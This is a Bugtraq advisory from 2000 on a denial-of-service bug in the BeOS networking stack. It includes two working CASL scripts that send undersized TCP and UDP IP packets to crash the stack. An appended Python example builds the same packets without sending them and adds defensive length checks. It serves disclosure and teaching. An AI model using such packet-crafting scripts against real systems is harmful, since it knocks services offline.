Bugtraq mailing list archives

BeOS Networking DOS
From: newsham () LAVA NET (Tim Newsham)
Date: Fri, 7 Apr 2000 12:45:09 -1000


Problem:
  It is possible to crash the BeOS networking process.

Discussion:
  The BeOS networking stack crashes when certain malformed packets
are sent to it.  This document explains two such packets.  The
first is an IP packet with the protocol field set to TCP.  If the
IP length field is set to be shorter than 40, it will crash the
networking process on reception.  Similarly, an IP packet with
protocol field set to UDP with an IP length of less than 28 also
crashes the stack.  The lengths 40 and 28 correspond with the
minimum sizes of the IP and TCP headers, and the IP and UDP headers
respectively.

  Because the networking stack is a separate process in BeOS, it may
be easily restarted after it crashes.

  A bug report has been filed with Be and assigned the bug number of
20000405-18674.  Be has marked the bug as "Will Not Fix" with the
comment "The entire networking system will be replaced soon."

  This bug was found with the help of the ISIC utility by Mike Frantzen.

  Two CASL scripts which demonstrate the bug are listed below.

References:
  http://www.be.com/  - Be's website.  BeOS is available for download
      free of charge.

  http://bebugs.be.com/devbugs/  - Be's bug tracking database.

  http://expert.cc.purdue.edu/~frantzen/ - The homepage of the
      ISIC author.

  ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting
      language CASL is available for download free of charge.

Script 1:
    #!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy UDPIP;

    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 27;

    packet = [ IPH ];
    ip_output(packet);

Script 2:
    #!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy TCPIP;

    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 39;

    packet = [ IPH ];
    ip_output(packet);
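The two datagrams the post describes, as an added example that is not part of the original post or of CASL: a stdlib-only Python builder that writes an arbitrary value into the IPv4 total-length field (nothing is sent on the network), together with the length check a receiving stack should perform before handing the datagram to TCP or UDP. The 10.0.0.1/10.0.0.2 addresses are taken from the CASL scripts above; the zero-filled padding, the function names and the check ordering are this example's own assumptions.

```python
"""Reproduce the two malformed packets from the post as byte strings and
show the length check a receiving stack must do before dispatching to the
transport layer.  Added example, not part of the original post; nothing is
sent on the network."""
import socket
import struct

IPPROTO_TCP = 6
IPPROTO_UDP = 17
IP_HDR_MIN = 20

# Minimum transport header sizes (RFC 793 TCP, RFC 768 UDP); the post's
# thresholds of 40 and 28 are IP_HDR_MIN plus these values.
MIN_TRANSPORT_LEN = {IPPROTO_TCP: 20, IPPROTO_UDP: 8}


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ip_packet(src: str, dst: str, proto: int, total_length: int,
                    payload: bytes = b"", ttl: int = 64) -> bytes:
    """IPv4 header (IHL=5, no options) followed by payload.

    total_length is written into the header exactly as given, so a value
    below IP_HDR_MIN + MIN_TRANSPORT_LEN[proto] produces the kind of
    datagram the post describes.  The header checksum is computed so the
    packet passes the receiver's checksum test and reaches its length
    logic."""
    ver_ihl = (4 << 4) | 5
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_length, 0, 0,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + payload


def check_ip_packet(pkt: bytes):
    """Sanity checks a stack should apply before touching the transport
    header.  Returns None if the datagram is acceptable, otherwise a
    string naming the first violated check."""
    if len(pkt) < IP_HDR_MIN:
        return "fewer than 20 bytes received"
    if pkt[0] >> 4 != 4:
        return "not IPv4"
    ihl = (pkt[0] & 0x0F) * 4
    if ihl < IP_HDR_MIN:
        return "IHL field below 5"
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if total_len < ihl:
        return "total length smaller than the IP header"
    if total_len > len(pkt):
        return "total length exceeds bytes received"
    if ip_checksum(pkt[:ihl]) != 0:
        return "bad IP header checksum"
    proto = pkt[9]
    need = MIN_TRANSPORT_LEN.get(proto)
    if need is not None and total_len - ihl < need:
        # The check the post implies the BeOS stack lacked: the bytes
        # left after the IP header cannot hold a minimal TCP/UDP header.
        return "proto %d: %d bytes after IP header, need %d" % (
            proto, total_len - ihl, need)
    return None


def post_packets(src="10.0.0.1", dst="10.0.0.2"):
    """The two datagrams from the CASL scripts (addresses taken from them).
    The zero payload pads each packet to its claimed length, so the only
    defect present is the undersized total-length field (assumption)."""
    udp = build_ip_packet(src, dst, IPPROTO_UDP, 27, b"\x00" * (27 - IP_HDR_MIN))
    tcp = build_ip_packet(src, dst, IPPROTO_TCP, 39, b"\x00" * (39 - IP_HDR_MIN))
    return {"script1_udp_len27": udp, "script2_tcp_len39": tcp}


if __name__ == "__main__":
    for name, pkt in post_packets().items():
        print(name, len(pkt), "bytes ->", check_ip_packet(pkt))
    ok = build_ip_packet("10.0.0.1", "10.0.0.2", IPPROTO_UDP, 28, b"\x00" * 8)
    print("udp_len28 ->", check_ip_packet(ok))
```

The checks are ordered so that each later test can rely on the earlier ones: the IHL is trusted only after the packet is known to hold a full 20-byte header, the total length only after it is known not to exceed what was actually received, and the transport-minimum test (the one the post's packets trip) runs last, on a header whose checksum has already been verified.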

